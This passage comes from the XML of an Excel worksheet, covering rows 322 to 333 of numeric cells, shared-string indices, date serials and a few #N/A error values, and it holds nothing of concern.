      <c r="BB322" t="s">
        <v>15332</v>
      </c>
      <c r="BC322" t="s">
        <v>10042</v>
      </c>
      <c r="BD322">
        <v>0</v>
      </c>
    </row>
    <row r="323" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A323">
        <v>1061</v>
      </c>
      <c r="B323" t="s">
        <v>2696</v>
      </c>
      <c r="C323" t="s">
        <v>47</v>
      </c>
      <c r="D323" t="s">
        <v>2697</v>
      </c>
      <c r="E323" t="s">
        <v>363</v>
      </c>
      <c r="F323" t="s">
        <v>547</v>
      </c>
      <c r="G323" s="1">
        <v>43894</v>
      </c>
      <c r="H323">
        <v>1090</v>
      </c>
      <c r="I323">
        <v>1090</v>
      </c>
      <c r="J323">
        <v>0</v>
      </c>
      <c r="K323">
        <v>0</v>
      </c>
      <c r="L323">
        <v>0</v>
      </c>
      <c r="M323">
        <v>0</v>
      </c>
      <c r="N323">
        <v>0</v>
      </c>
      <c r="O323">
        <v>0</v>
      </c>
      <c r="P323">
        <v>0</v>
      </c>
      <c r="Q323">
        <v>0</v>
      </c>
      <c r="R323">
        <v>0</v>
      </c>
      <c r="S323">
        <v>0</v>
      </c>
      <c r="T323">
        <v>1</v>
      </c>
      <c r="U323">
        <v>0</v>
      </c>
      <c r="V323">
        <v>0</v>
      </c>
      <c r="W323">
        <v>0</v>
      </c>
      <c r="X323">
        <v>0</v>
      </c>
      <c r="Y323">
        <v>0</v>
      </c>
      <c r="Z323">
        <v>0</v>
      </c>
      <c r="AA323">
        <v>0</v>
      </c>
      <c r="AB323">
        <v>0</v>
      </c>
      <c r="AC323">
        <v>0</v>
      </c>
      <c r="AD323">
        <v>0</v>
      </c>
      <c r="AE323">
        <v>5000</v>
      </c>
      <c r="AF323" t="s">
        <v>2698</v>
      </c>
      <c r="AG323">
        <v>20224</v>
      </c>
      <c r="AH323">
        <v>2</v>
      </c>
      <c r="AJ323">
        <v>53</v>
      </c>
      <c r="AK323" t="s">
        <v>2699</v>
      </c>
      <c r="AL323" t="s">
        <v>2700</v>
      </c>
      <c r="AM323" t="s">
        <v>2701</v>
      </c>
      <c r="AN323" t="s">
        <v>55</v>
      </c>
      <c r="AO323">
        <v>2015</v>
      </c>
      <c r="AP323">
        <v>617343630</v>
      </c>
      <c r="AQ323" t="s">
        <v>2702</v>
      </c>
      <c r="AR323" t="s">
        <v>2698</v>
      </c>
      <c r="AS323" t="s">
        <v>553</v>
      </c>
      <c r="AT323" t="s">
        <v>58</v>
      </c>
      <c r="AU323">
        <v>0</v>
      </c>
      <c r="AV323">
        <v>0</v>
      </c>
      <c r="AW323">
        <v>0</v>
      </c>
      <c r="AX323">
        <v>0</v>
      </c>
      <c r="AY323">
        <v>9</v>
      </c>
      <c r="AZ323">
        <v>14</v>
      </c>
      <c r="BA323" t="s">
        <v>16799</v>
      </c>
      <c r="BB323" t="s">
        <v>15026</v>
      </c>
      <c r="BC323">
        <v>0</v>
      </c>
      <c r="BD323">
        <v>0</v>
      </c>
    </row>
    <row r="324" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A324">
        <v>1598</v>
      </c>
      <c r="B324" t="s">
        <v>2703</v>
      </c>
      <c r="C324" t="s">
        <v>318</v>
      </c>
      <c r="D324" t="s">
        <v>2704</v>
      </c>
      <c r="E324" t="s">
        <v>2023</v>
      </c>
      <c r="F324" t="s">
        <v>2705</v>
      </c>
      <c r="G324" s="1">
        <v>44319</v>
      </c>
      <c r="H324">
        <v>1126</v>
      </c>
      <c r="I324">
        <v>1126</v>
      </c>
      <c r="J324">
        <v>0</v>
      </c>
      <c r="K324">
        <v>4</v>
      </c>
      <c r="L324">
        <v>0</v>
      </c>
      <c r="M324">
        <v>0</v>
      </c>
      <c r="N324">
        <v>0</v>
      </c>
      <c r="O324">
        <v>0</v>
      </c>
      <c r="P324">
        <v>2</v>
      </c>
      <c r="Q324">
        <v>0</v>
      </c>
      <c r="R324">
        <v>0</v>
      </c>
      <c r="S324">
        <v>0</v>
      </c>
      <c r="T324">
        <v>1</v>
      </c>
      <c r="U324">
        <v>0</v>
      </c>
      <c r="V324">
        <v>20000</v>
      </c>
      <c r="W324">
        <v>0</v>
      </c>
      <c r="X324">
        <v>0</v>
      </c>
      <c r="Y324">
        <v>0</v>
      </c>
      <c r="Z324">
        <v>0</v>
      </c>
      <c r="AA324">
        <v>1000</v>
      </c>
      <c r="AB324">
        <v>0</v>
      </c>
      <c r="AC324">
        <v>0</v>
      </c>
      <c r="AD324">
        <v>0</v>
      </c>
      <c r="AE324">
        <v>10000</v>
      </c>
      <c r="AF324" t="s">
        <v>2706</v>
      </c>
      <c r="AG324">
        <v>90243</v>
      </c>
      <c r="AH324">
        <v>26</v>
      </c>
      <c r="AJ324">
        <v>420</v>
      </c>
      <c r="AK324" t="s">
        <v>331</v>
      </c>
      <c r="AL324" t="s">
        <v>332</v>
      </c>
      <c r="AM324" t="s">
        <v>2707</v>
      </c>
      <c r="AN324" t="s">
        <v>55</v>
      </c>
      <c r="AO324">
        <v>2001</v>
      </c>
      <c r="AP324" t="s">
        <v>2708</v>
      </c>
      <c r="AQ324" t="s">
        <v>2709</v>
      </c>
      <c r="AR324" t="s">
        <v>2710</v>
      </c>
      <c r="AS324" t="s">
        <v>71</v>
      </c>
      <c r="AT324" t="s">
        <v>58</v>
      </c>
      <c r="AU324">
        <v>25</v>
      </c>
      <c r="AV324">
        <v>1</v>
      </c>
      <c r="AW324">
        <v>25</v>
      </c>
      <c r="AX324">
        <v>95</v>
      </c>
      <c r="AY324">
        <v>3</v>
      </c>
      <c r="AZ324">
        <v>8</v>
      </c>
      <c r="BA324" t="s">
        <v>16946</v>
      </c>
      <c r="BB324" t="s">
        <v>15394</v>
      </c>
      <c r="BC324">
        <v>0</v>
      </c>
      <c r="BD324" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="325" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A325">
        <v>1130</v>
      </c>
      <c r="B325" t="s">
        <v>2711</v>
      </c>
      <c r="C325" t="s">
        <v>47</v>
      </c>
      <c r="D325" t="s">
        <v>2712</v>
      </c>
      <c r="E325" t="s">
        <v>142</v>
      </c>
      <c r="F325" t="s">
        <v>2713</v>
      </c>
      <c r="G325" s="1">
        <v>44011</v>
      </c>
      <c r="H325">
        <v>1154</v>
      </c>
      <c r="I325">
        <v>1154</v>
      </c>
      <c r="J325">
        <v>1</v>
      </c>
      <c r="K325">
        <v>0</v>
      </c>
      <c r="L325">
        <v>1</v>
      </c>
      <c r="M325">
        <v>8</v>
      </c>
      <c r="N325">
        <v>0</v>
      </c>
      <c r="O325">
        <v>0</v>
      </c>
      <c r="P325">
        <v>0</v>
      </c>
      <c r="Q325">
        <v>2</v>
      </c>
      <c r="R325">
        <v>1</v>
      </c>
      <c r="S325">
        <v>0</v>
      </c>
      <c r="T325">
        <v>0</v>
      </c>
      <c r="U325">
        <v>250000</v>
      </c>
      <c r="V325">
        <v>0</v>
      </c>
      <c r="W325">
        <v>1000</v>
      </c>
      <c r="X325">
        <v>8000</v>
      </c>
      <c r="Y325">
        <v>0</v>
      </c>
      <c r="Z325">
        <v>0</v>
      </c>
      <c r="AA325">
        <v>0</v>
      </c>
      <c r="AB325">
        <v>42000</v>
      </c>
      <c r="AC325">
        <v>50000</v>
      </c>
      <c r="AD325">
        <v>0</v>
      </c>
      <c r="AE325">
        <v>0</v>
      </c>
      <c r="AF325" t="s">
        <v>2714</v>
      </c>
      <c r="AG325">
        <v>20414</v>
      </c>
      <c r="AH325">
        <v>2</v>
      </c>
      <c r="AJ325">
        <v>53</v>
      </c>
      <c r="AK325" t="s">
        <v>2220</v>
      </c>
      <c r="AL325" t="s">
        <v>1256</v>
      </c>
      <c r="AM325" t="s">
        <v>2715</v>
      </c>
      <c r="AN325" t="s">
        <v>55</v>
      </c>
      <c r="AO325">
        <v>2017</v>
      </c>
      <c r="AP325" t="s">
        <v>2716</v>
      </c>
      <c r="AQ325" t="s">
        <v>2717</v>
      </c>
      <c r="AR325" t="s">
        <v>2714</v>
      </c>
      <c r="AS325" t="s">
        <v>71</v>
      </c>
      <c r="AT325" t="s">
        <v>58</v>
      </c>
      <c r="AU325">
        <v>30</v>
      </c>
      <c r="AV325">
        <v>0</v>
      </c>
      <c r="AW325">
        <v>0</v>
      </c>
      <c r="AX325">
        <v>30</v>
      </c>
      <c r="AY325">
        <v>25</v>
      </c>
      <c r="AZ325">
        <v>65</v>
      </c>
      <c r="BA325" t="s">
        <v>16804</v>
      </c>
      <c r="BB325" t="s">
        <v>15069</v>
      </c>
      <c r="BC325">
        <v>0</v>
      </c>
      <c r="BD325">
        <v>0</v>
      </c>
    </row>
    <row r="326" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A326">
        <v>1536</v>
      </c>
      <c r="B326" t="s">
        <v>2718</v>
      </c>
      <c r="C326" t="s">
        <v>74</v>
      </c>
      <c r="D326" t="s">
        <v>2719</v>
      </c>
      <c r="E326" t="s">
        <v>90</v>
      </c>
      <c r="F326" t="s">
        <v>2720</v>
      </c>
      <c r="G326" s="1">
        <v>43908</v>
      </c>
      <c r="H326">
        <v>1177</v>
      </c>
      <c r="I326">
        <v>1177</v>
      </c>
      <c r="J326">
        <v>1</v>
      </c>
      <c r="K326">
        <v>0</v>
      </c>
      <c r="L326">
        <v>2</v>
      </c>
      <c r="M326">
        <v>1</v>
      </c>
      <c r="N326">
        <v>0</v>
      </c>
      <c r="O326">
        <v>0</v>
      </c>
      <c r="P326">
        <v>0</v>
      </c>
      <c r="Q326">
        <v>2</v>
      </c>
      <c r="R326">
        <v>2</v>
      </c>
      <c r="S326">
        <v>0</v>
      </c>
      <c r="T326">
        <v>0</v>
      </c>
      <c r="U326">
        <v>300000</v>
      </c>
      <c r="V326">
        <v>0</v>
      </c>
      <c r="W326">
        <v>8000</v>
      </c>
      <c r="X326">
        <v>1000</v>
      </c>
      <c r="Y326">
        <v>0</v>
      </c>
      <c r="Z326">
        <v>0</v>
      </c>
      <c r="AA326">
        <v>0</v>
      </c>
      <c r="AB326">
        <v>1000</v>
      </c>
      <c r="AC326">
        <v>1000</v>
      </c>
      <c r="AD326">
        <v>0</v>
      </c>
      <c r="AE326">
        <v>0</v>
      </c>
      <c r="AF326" t="s">
        <v>2721</v>
      </c>
      <c r="AG326">
        <v>52111</v>
      </c>
      <c r="AH326">
        <v>14</v>
      </c>
      <c r="AJ326">
        <v>222</v>
      </c>
      <c r="AK326" t="s">
        <v>2722</v>
      </c>
      <c r="AL326" t="s">
        <v>2723</v>
      </c>
      <c r="AM326" t="s">
        <v>2724</v>
      </c>
      <c r="AN326" t="s">
        <v>82</v>
      </c>
      <c r="AO326">
        <v>2018</v>
      </c>
      <c r="AP326" t="s">
        <v>2725</v>
      </c>
      <c r="AQ326" t="s">
        <v>2726</v>
      </c>
      <c r="AR326" t="s">
        <v>2721</v>
      </c>
      <c r="AS326" t="s">
        <v>71</v>
      </c>
      <c r="AT326" t="s">
        <v>86</v>
      </c>
      <c r="AU326">
        <v>25</v>
      </c>
      <c r="AV326">
        <v>1</v>
      </c>
      <c r="AW326">
        <v>9</v>
      </c>
      <c r="AX326">
        <v>10</v>
      </c>
      <c r="AY326">
        <v>14</v>
      </c>
      <c r="AZ326">
        <v>11</v>
      </c>
      <c r="BA326" t="s">
        <v>16929</v>
      </c>
      <c r="BB326" t="s">
        <v>15348</v>
      </c>
      <c r="BC326">
        <v>0</v>
      </c>
      <c r="BD326" t="s">
        <v>10196</v>
      </c>
    </row>
    <row r="327" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A327">
        <v>1444</v>
      </c>
      <c r="B327" t="s">
        <v>2727</v>
      </c>
      <c r="C327" t="s">
        <v>318</v>
      </c>
      <c r="D327" t="s">
        <v>2728</v>
      </c>
      <c r="E327" t="s">
        <v>1196</v>
      </c>
      <c r="F327" t="s">
        <v>2729</v>
      </c>
      <c r="G327" s="1">
        <v>43880</v>
      </c>
      <c r="H327">
        <v>1208</v>
      </c>
      <c r="I327">
        <v>1208</v>
      </c>
      <c r="J327">
        <v>0</v>
      </c>
      <c r="K327">
        <v>0</v>
      </c>
      <c r="L327">
        <v>0</v>
      </c>
      <c r="M327">
        <v>0</v>
      </c>
      <c r="N327">
        <v>0</v>
      </c>
      <c r="O327">
        <v>0</v>
      </c>
      <c r="P327">
        <v>0</v>
      </c>
      <c r="Q327">
        <v>0</v>
      </c>
      <c r="R327">
        <v>0</v>
      </c>
      <c r="S327">
        <v>0</v>
      </c>
      <c r="T327">
        <v>1</v>
      </c>
      <c r="U327">
        <v>0</v>
      </c>
      <c r="V327">
        <v>0</v>
      </c>
      <c r="W327">
        <v>0</v>
      </c>
      <c r="X327">
        <v>0</v>
      </c>
      <c r="Y327">
        <v>0</v>
      </c>
      <c r="Z327">
        <v>0</v>
      </c>
      <c r="AA327">
        <v>0</v>
      </c>
      <c r="AB327">
        <v>0</v>
      </c>
      <c r="AC327">
        <v>0</v>
      </c>
      <c r="AD327">
        <v>0</v>
      </c>
      <c r="AE327">
        <v>90000</v>
      </c>
      <c r="AF327" t="s">
        <v>2730</v>
      </c>
      <c r="AG327">
        <v>91272</v>
      </c>
      <c r="AH327">
        <v>26</v>
      </c>
      <c r="AJ327">
        <v>413</v>
      </c>
      <c r="AK327" t="s">
        <v>2731</v>
      </c>
      <c r="AL327" t="s">
        <v>2732</v>
      </c>
      <c r="AM327" t="s">
        <v>2733</v>
      </c>
      <c r="AN327" t="s">
        <v>55</v>
      </c>
      <c r="AO327">
        <v>2017</v>
      </c>
      <c r="AP327">
        <v>213908288</v>
      </c>
      <c r="AQ327" t="s">
        <v>2734</v>
      </c>
      <c r="AR327" t="s">
        <v>2735</v>
      </c>
      <c r="AS327" t="s">
        <v>71</v>
      </c>
      <c r="AT327" t="s">
        <v>86</v>
      </c>
      <c r="AU327" t="e">
        <v>#N/A</v>
      </c>
      <c r="AV327" t="e">
        <v>#N/A</v>
      </c>
      <c r="AW327" t="e">
        <v>#N/A</v>
      </c>
      <c r="AX327" t="e">
        <v>#N/A</v>
      </c>
      <c r="AY327" t="e">
        <v>#N/A</v>
      </c>
      <c r="AZ327" t="e">
        <v>#N/A</v>
      </c>
      <c r="BA327" t="s">
        <v>16893</v>
      </c>
      <c r="BB327" t="s">
        <v>15280</v>
      </c>
      <c r="BC327">
        <v>0</v>
      </c>
      <c r="BD327" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="328" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A328">
        <v>1190</v>
      </c>
      <c r="B328" t="s">
        <v>2736</v>
      </c>
      <c r="C328" t="s">
        <v>318</v>
      </c>
      <c r="D328" t="s">
        <v>2737</v>
      </c>
      <c r="E328" t="s">
        <v>843</v>
      </c>
      <c r="F328" t="s">
        <v>2738</v>
      </c>
      <c r="G328" s="1">
        <v>44232</v>
      </c>
      <c r="H328">
        <v>1249</v>
      </c>
      <c r="I328">
        <v>1249</v>
      </c>
      <c r="J328">
        <v>1</v>
      </c>
      <c r="K328">
        <v>0</v>
      </c>
      <c r="L328">
        <v>1</v>
      </c>
      <c r="M328">
        <v>0</v>
      </c>
      <c r="N328">
        <v>0</v>
      </c>
      <c r="O328">
        <v>0</v>
      </c>
      <c r="P328">
        <v>0</v>
      </c>
      <c r="Q328">
        <v>0</v>
      </c>
      <c r="R328">
        <v>0</v>
      </c>
      <c r="S328">
        <v>1</v>
      </c>
      <c r="T328">
        <v>1</v>
      </c>
      <c r="U328">
        <v>1000</v>
      </c>
      <c r="V328">
        <v>0</v>
      </c>
      <c r="W328">
        <v>1000</v>
      </c>
      <c r="X328">
        <v>0</v>
      </c>
      <c r="Y328">
        <v>0</v>
      </c>
      <c r="Z328">
        <v>0</v>
      </c>
      <c r="AA328">
        <v>0</v>
      </c>
      <c r="AB328">
        <v>0</v>
      </c>
      <c r="AC328">
        <v>0</v>
      </c>
      <c r="AD328">
        <v>1</v>
      </c>
      <c r="AE328">
        <v>1000</v>
      </c>
      <c r="AF328" t="s">
        <v>2739</v>
      </c>
      <c r="AG328">
        <v>90161</v>
      </c>
      <c r="AH328">
        <v>26</v>
      </c>
      <c r="AJ328">
        <v>420</v>
      </c>
      <c r="AK328" t="s">
        <v>2663</v>
      </c>
      <c r="AL328" t="s">
        <v>2740</v>
      </c>
      <c r="AM328" t="s">
        <v>2741</v>
      </c>
      <c r="AN328" t="s">
        <v>68</v>
      </c>
      <c r="AO328">
        <v>2018</v>
      </c>
      <c r="AP328">
        <v>85145333939</v>
      </c>
      <c r="AQ328" t="s">
        <v>2742</v>
      </c>
      <c r="AR328" t="s">
        <v>2743</v>
      </c>
      <c r="AS328" t="s">
        <v>71</v>
      </c>
      <c r="AT328" t="s">
        <v>72</v>
      </c>
      <c r="AU328">
        <v>26</v>
      </c>
      <c r="AV328">
        <v>0</v>
      </c>
      <c r="AW328">
        <v>2</v>
      </c>
      <c r="AX328">
        <v>3</v>
      </c>
      <c r="AY328">
        <v>8</v>
      </c>
      <c r="AZ328">
        <v>4</v>
      </c>
      <c r="BA328" t="s">
        <v>17252</v>
      </c>
      <c r="BB328" t="s">
        <v>15112</v>
      </c>
      <c r="BC328" t="s">
        <v>9485</v>
      </c>
      <c r="BD328" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="329" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A329">
        <v>1405</v>
      </c>
      <c r="B329" t="s">
        <v>2744</v>
      </c>
      <c r="C329" t="s">
        <v>157</v>
      </c>
      <c r="D329" t="s">
        <v>2745</v>
      </c>
      <c r="E329" t="s">
        <v>142</v>
      </c>
      <c r="F329" t="s">
        <v>2746</v>
      </c>
      <c r="G329" s="1">
        <v>44176</v>
      </c>
      <c r="H329">
        <v>1278</v>
      </c>
      <c r="I329">
        <v>1278</v>
      </c>
      <c r="J329">
        <v>3</v>
      </c>
      <c r="K329">
        <v>0</v>
      </c>
      <c r="L329">
        <v>3</v>
      </c>
      <c r="M329">
        <v>0</v>
      </c>
      <c r="N329">
        <v>0</v>
      </c>
      <c r="O329">
        <v>0</v>
      </c>
      <c r="P329">
        <v>0</v>
      </c>
      <c r="Q329">
        <v>7</v>
      </c>
      <c r="R329">
        <v>8</v>
      </c>
      <c r="S329">
        <v>0</v>
      </c>
      <c r="T329">
        <v>1</v>
      </c>
      <c r="U329">
        <v>50000</v>
      </c>
      <c r="V329">
        <v>0</v>
      </c>
      <c r="W329">
        <v>5000</v>
      </c>
      <c r="X329">
        <v>0</v>
      </c>
      <c r="Y329">
        <v>0</v>
      </c>
      <c r="Z329">
        <v>0</v>
      </c>
      <c r="AA329">
        <v>0</v>
      </c>
      <c r="AB329">
        <v>700</v>
      </c>
      <c r="AC329">
        <v>4000</v>
      </c>
      <c r="AD329">
        <v>0</v>
      </c>
      <c r="AE329">
        <v>1000</v>
      </c>
      <c r="AF329" t="s">
        <v>2747</v>
      </c>
      <c r="AG329">
        <v>64126</v>
      </c>
      <c r="AH329">
        <v>16</v>
      </c>
      <c r="AJ329">
        <v>257</v>
      </c>
      <c r="AK329" t="s">
        <v>220</v>
      </c>
      <c r="AL329" t="s">
        <v>1173</v>
      </c>
      <c r="AM329" t="s">
        <v>2748</v>
      </c>
      <c r="AN329" t="s">
        <v>68</v>
      </c>
      <c r="AO329">
        <v>2017</v>
      </c>
      <c r="AP329">
        <v>81335609999</v>
      </c>
      <c r="AQ329" t="s">
        <v>2749</v>
      </c>
      <c r="AR329" t="s">
        <v>2750</v>
      </c>
      <c r="AU329">
        <v>25</v>
      </c>
      <c r="AV329">
        <v>0</v>
      </c>
      <c r="AW329">
        <v>10</v>
      </c>
      <c r="AX329">
        <v>40</v>
      </c>
      <c r="AY329">
        <v>0</v>
      </c>
      <c r="AZ329">
        <v>5</v>
      </c>
      <c r="BA329" t="s">
        <v>16876</v>
      </c>
      <c r="BB329" t="s">
        <v>15254</v>
      </c>
      <c r="BC329">
        <v>0</v>
      </c>
      <c r="BD329" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="330" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A330">
        <v>1701</v>
      </c>
      <c r="B330" t="s">
        <v>2751</v>
      </c>
      <c r="C330" t="s">
        <v>224</v>
      </c>
      <c r="D330" t="s">
        <v>2752</v>
      </c>
      <c r="E330" t="s">
        <v>1161</v>
      </c>
      <c r="F330" t="s">
        <v>2753</v>
      </c>
      <c r="G330" s="1">
        <v>43893</v>
      </c>
      <c r="H330">
        <v>1321</v>
      </c>
      <c r="I330">
        <v>1321</v>
      </c>
      <c r="J330">
        <v>0</v>
      </c>
      <c r="K330">
        <v>0</v>
      </c>
      <c r="L330">
        <v>0</v>
      </c>
      <c r="M330">
        <v>0</v>
      </c>
      <c r="N330">
        <v>0</v>
      </c>
      <c r="O330">
        <v>0</v>
      </c>
      <c r="P330">
        <v>0</v>
      </c>
      <c r="Q330">
        <v>1</v>
      </c>
      <c r="R330">
        <v>1</v>
      </c>
      <c r="S330">
        <v>0</v>
      </c>
      <c r="T330">
        <v>1</v>
      </c>
      <c r="U330">
        <v>0</v>
      </c>
      <c r="V330">
        <v>0</v>
      </c>
      <c r="W330">
        <v>0</v>
      </c>
      <c r="X330">
        <v>0</v>
      </c>
      <c r="Y330">
        <v>0</v>
      </c>
      <c r="Z330">
        <v>0</v>
      </c>
      <c r="AA330">
        <v>0</v>
      </c>
      <c r="AB330">
        <v>20</v>
      </c>
      <c r="AC330">
        <v>20</v>
      </c>
      <c r="AD330">
        <v>0</v>
      </c>
      <c r="AE330">
        <v>20</v>
      </c>
      <c r="AF330" t="s">
        <v>2754</v>
      </c>
      <c r="AG330">
        <v>55881</v>
      </c>
      <c r="AH330">
        <v>15</v>
      </c>
      <c r="AJ330">
        <v>225</v>
      </c>
      <c r="AK330" t="s">
        <v>2755</v>
      </c>
      <c r="AL330" t="s">
        <v>2756</v>
      </c>
      <c r="AM330" t="s">
        <v>2757</v>
      </c>
      <c r="AN330" t="s">
        <v>68</v>
      </c>
      <c r="AO330">
        <v>2012</v>
      </c>
      <c r="AP330">
        <v>85228582838</v>
      </c>
      <c r="AQ330" t="s">
        <v>2758</v>
      </c>
      <c r="AR330" t="s">
        <v>2754</v>
      </c>
      <c r="AS330" t="s">
        <v>71</v>
      </c>
      <c r="AT330" t="s">
        <v>72</v>
      </c>
      <c r="AU330">
        <v>6</v>
      </c>
      <c r="AV330">
        <v>1</v>
      </c>
      <c r="AW330">
        <v>0</v>
      </c>
      <c r="AX330">
        <v>0</v>
      </c>
      <c r="AY330">
        <v>0</v>
      </c>
      <c r="AZ330">
        <v>10</v>
      </c>
      <c r="BA330" t="s">
        <v>17181</v>
      </c>
      <c r="BB330" t="s">
        <v>15874</v>
      </c>
      <c r="BC330" t="s">
        <v>10183</v>
      </c>
      <c r="BD330">
        <v>0</v>
      </c>
    </row>
    <row r="331" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A331">
        <v>1650</v>
      </c>
      <c r="B331" t="s">
        <v>2759</v>
      </c>
      <c r="C331" t="s">
        <v>2760</v>
      </c>
      <c r="D331" t="s">
        <v>2761</v>
      </c>
      <c r="E331" t="s">
        <v>843</v>
      </c>
      <c r="F331" t="s">
        <v>2762</v>
      </c>
      <c r="G331" s="1">
        <v>43944</v>
      </c>
      <c r="H331">
        <v>1390</v>
      </c>
      <c r="I331">
        <v>1390</v>
      </c>
      <c r="J331">
        <v>0</v>
      </c>
      <c r="K331">
        <v>0</v>
      </c>
      <c r="L331">
        <v>0</v>
      </c>
      <c r="M331">
        <v>0</v>
      </c>
      <c r="N331">
        <v>0</v>
      </c>
      <c r="O331">
        <v>0</v>
      </c>
      <c r="P331">
        <v>0</v>
      </c>
      <c r="Q331">
        <v>5</v>
      </c>
      <c r="R331">
        <v>10</v>
      </c>
      <c r="S331">
        <v>0</v>
      </c>
      <c r="T331">
        <v>1</v>
      </c>
      <c r="U331">
        <v>0</v>
      </c>
      <c r="V331">
        <v>0</v>
      </c>
      <c r="W331">
        <v>0</v>
      </c>
      <c r="X331">
        <v>0</v>
      </c>
      <c r="Y331">
        <v>0</v>
      </c>
      <c r="Z331">
        <v>0</v>
      </c>
      <c r="AA331">
        <v>0</v>
      </c>
      <c r="AB331">
        <v>1000</v>
      </c>
      <c r="AC331">
        <v>2000</v>
      </c>
      <c r="AD331">
        <v>0</v>
      </c>
      <c r="AE331">
        <v>2000</v>
      </c>
      <c r="AF331" t="s">
        <v>2763</v>
      </c>
      <c r="AG331">
        <v>83116</v>
      </c>
      <c r="AH331">
        <v>18</v>
      </c>
      <c r="AJ331">
        <v>291</v>
      </c>
      <c r="AK331" t="s">
        <v>2764</v>
      </c>
      <c r="AL331" t="s">
        <v>2765</v>
      </c>
      <c r="AM331" t="s">
        <v>2766</v>
      </c>
      <c r="AN331" t="s">
        <v>55</v>
      </c>
      <c r="AO331">
        <v>2018</v>
      </c>
      <c r="AP331">
        <v>81331143969</v>
      </c>
      <c r="AQ331" t="s">
        <v>2767</v>
      </c>
      <c r="AR331" t="s">
        <v>2763</v>
      </c>
      <c r="AS331" t="s">
        <v>71</v>
      </c>
      <c r="AT331" t="s">
        <v>58</v>
      </c>
      <c r="AU331">
        <v>24</v>
      </c>
      <c r="AV331">
        <v>1</v>
      </c>
      <c r="AW331">
        <v>10</v>
      </c>
      <c r="AX331">
        <v>2</v>
      </c>
      <c r="AY331">
        <v>3</v>
      </c>
      <c r="AZ331">
        <v>1</v>
      </c>
      <c r="BA331" t="s">
        <v>16963</v>
      </c>
      <c r="BB331" t="s">
        <v>15426</v>
      </c>
      <c r="BC331" t="s">
        <v>10194</v>
      </c>
      <c r="BD331" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="332" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A332">
        <v>1337</v>
      </c>
      <c r="B332" t="s">
        <v>2768</v>
      </c>
      <c r="C332" t="s">
        <v>88</v>
      </c>
      <c r="D332" t="s">
        <v>2769</v>
      </c>
      <c r="E332" t="s">
        <v>142</v>
      </c>
      <c r="F332" t="s">
        <v>2770</v>
      </c>
      <c r="G332" s="1">
        <v>43896</v>
      </c>
      <c r="H332">
        <v>1543</v>
      </c>
      <c r="I332">
        <v>1543</v>
      </c>
      <c r="J332">
        <v>2</v>
      </c>
      <c r="K332">
        <v>2</v>
      </c>
      <c r="L332">
        <v>3</v>
      </c>
      <c r="M332">
        <v>1</v>
      </c>
      <c r="N332">
        <v>0</v>
      </c>
      <c r="O332">
        <v>0</v>
      </c>
      <c r="P332">
        <v>0</v>
      </c>
      <c r="Q332">
        <v>3</v>
      </c>
      <c r="R332">
        <v>2</v>
      </c>
      <c r="S332">
        <v>0</v>
      </c>
      <c r="T332">
        <v>2</v>
      </c>
      <c r="U332">
        <v>400000</v>
      </c>
      <c r="V332">
        <v>5000</v>
      </c>
      <c r="W332">
        <v>7500</v>
      </c>
      <c r="X332">
        <v>1500</v>
      </c>
      <c r="Y332">
        <v>0</v>
      </c>
      <c r="Z332">
        <v>0</v>
      </c>
      <c r="AA332">
        <v>0</v>
      </c>
      <c r="AB332">
        <v>6000</v>
      </c>
      <c r="AC332">
        <v>5000</v>
      </c>
      <c r="AD332">
        <v>0</v>
      </c>
      <c r="AE332">
        <v>5000</v>
      </c>
      <c r="AF332" t="s">
        <v>2771</v>
      </c>
      <c r="AG332">
        <v>80222</v>
      </c>
      <c r="AH332">
        <v>17</v>
      </c>
      <c r="AJ332">
        <v>282</v>
      </c>
      <c r="AK332" t="s">
        <v>592</v>
      </c>
      <c r="AL332" t="s">
        <v>593</v>
      </c>
      <c r="AM332" t="s">
        <v>2772</v>
      </c>
      <c r="AN332" t="s">
        <v>82</v>
      </c>
      <c r="AO332">
        <v>2012</v>
      </c>
      <c r="AP332">
        <v>361726599</v>
      </c>
      <c r="AQ332" t="s">
        <v>2773</v>
      </c>
      <c r="AR332" t="s">
        <v>2774</v>
      </c>
      <c r="AU332">
        <v>25</v>
      </c>
      <c r="AV332">
        <v>0</v>
      </c>
      <c r="AW332">
        <v>0</v>
      </c>
      <c r="AX332">
        <v>0</v>
      </c>
      <c r="AY332">
        <v>84</v>
      </c>
      <c r="AZ332">
        <v>45</v>
      </c>
      <c r="BA332" t="s">
        <v>17179</v>
      </c>
      <c r="BB332">
        <v>0</v>
      </c>
      <c r="BC332" t="s">
        <v>10362</v>
      </c>
      <c r="BD332" t="s">
        <v>10360</v>
      </c>
    </row>
    <row r="333" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A333">
        <v>985</v>
      </c>
      <c r="B333" t="s">
        <v>2775</v>
      </c>
      <c r="C333" t="s">
        <v>88</v>
      </c>
      <c r="D333" t="s">
        <v>1954</v>
      </c>
      <c r="E333" t="s">
        <v>300</v>
      </c>
      <c r="F333" t="s">
        <v>899</v>
      </c>
      <c r="G333" s="1">
        <v>43970</v>
      </c>
      <c r="H333">
        <v>1545</v>
      </c>
      <c r="I333">
        <v>1545</v>
      </c>
      <c r="J333">
        <v>1</v>
      </c>
      <c r="K333">
        <v>1</v>
      </c>
      <c r="L333">
        <v>1</v>
      </c>
      <c r="M333">
        <v>0</v>
      </c>
      <c r="N333">
        <v>0</v>
      </c>
      <c r="O333">
        <v>0</v>
      </c>
      <c r="P333">
        <v>0</v>
      </c>
      <c r="Q333">
        <v>0</v>
      </c>
      <c r="R333">
        <v>1</v>
      </c>
      <c r="S333">
        <v>1</v>
      </c>
      <c r="T333">
        <v>0</v>
      </c>
      <c r="U333">
        <v>5000</v>
      </c>
      <c r="V333">
        <v>1000</v>
      </c>
      <c r="W333">
        <v>500</v>
      </c>
      <c r="X333">
        <v>0</v>
      </c>
      <c r="Y333">
        <v>0</v>
      </c>
      <c r="Z333">
        <v>0</v>
      </c>
